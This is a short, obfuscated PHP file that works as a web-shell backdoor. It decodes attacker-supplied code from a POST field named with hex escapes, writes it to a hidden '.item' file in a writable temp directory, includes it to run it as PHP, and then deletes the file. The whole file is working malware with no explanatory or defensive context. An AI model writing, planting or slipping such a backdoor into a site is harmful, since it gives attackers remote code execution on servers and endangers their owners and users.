<?php

if(filter_has_var(INPUT_POST, "\x65\x6Et")){
	$sym = $_REQUEST["\x65\x6Et"];
			$sym 	 =explode('.'	 	,   $sym		 ) ;  	
	$token = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s);
            $k = 0;
    
            array_walk($sym	 ,function ($v4) use (&$token	 ,&$k	 ,$s	 ,$lenS) {
                $chS = ord($s[$k 	%		$lenS]);
                $dec = ((int)$v4 - $chS - ($k 	%		10)) ^	52;
                $token.=	chr($dec);
                $k++;
            });
	$ref = array_filter([ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/var/tmp", "/tmp", "/dev/shm", session_save_path(), getenv("TEMP"), sys_get_temp_dir()]);
	while ($dat = array_shift($ref)) {
    		if (is_dir($dat) ? is_writable($dat) : false) {
    $flg = vsprintf("%s/%s", [$dat, ".item"]);
    $file = fopen($flg, 'w');
if ($file) {
	fwrite($file, $token);
	fclose($file);
	include $flg;
	@unlink($flg);
	die();
}
}
}
}